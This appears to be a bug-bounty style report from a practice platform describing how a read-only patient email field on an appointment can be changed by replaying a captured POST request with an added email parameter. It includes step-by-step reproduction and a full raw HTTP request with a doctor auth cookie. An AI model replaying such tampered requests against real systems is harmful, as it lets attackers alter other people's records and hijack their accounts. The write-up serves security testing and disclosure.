BugBountyHunter

Summary:

It is possible to modify the email address of an appointment. The same vulnerability was present in V1 of First Blood.

Description:

When modifying an appointment the application tells us that "For safeguarding reasons you are only able to modify certain information about your appointment." The "patient email" field is grayed and we're unable to modify it through the webpage. However if we capture the POST request to modify the appointment message, we will be able to modify the email field.

Steps to Reproduce:

1. Create an appointment with email "ff".

2. Log in into a doctor's account so we get a "doctorAuthed" cookie in Step 5.
3. Go to modify that appointment, /manageappointment.php?success&aptid=2dbd91e1-b700-455e-a846-322be1985c41
4. Click on "modify event" and capture the request with Burp
5. Replay the request and add "&email=changedemail"

POST /api/ma.php?success&aptid=2dbd91e1-b700-455e-a846-322be1985c41 HTTP/1.1
Host: ca20e7622a6e-vigilante.a.firstbloodhackers.com
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; drps=b0b1f17cbc0fdc9a9ce23dfdf
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Site-Req: permitted
Csrf: 99215d4e-0ff3-4275
Content-Length: 71
Origin: https://ca20e7622a6e-vigilante.a.firstbloodhackers.com
Referer: https://ca20e7622a6e-vigilante.a.firstbloodhackers.com/manageappointment.php?success&aptid=2dbd91e1-b700-455e-a846-322be1985c41
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

message=test&id=2dbd91e1-b700-455e-a846-322be1985c41&email=changedemail

6. After sending this, the patient's email address will change to "changedemail".

Impact

If someone got a hold of our appointment id and they added the "doctorAuthed" cookie, they'd be able to change the email address to their own email address.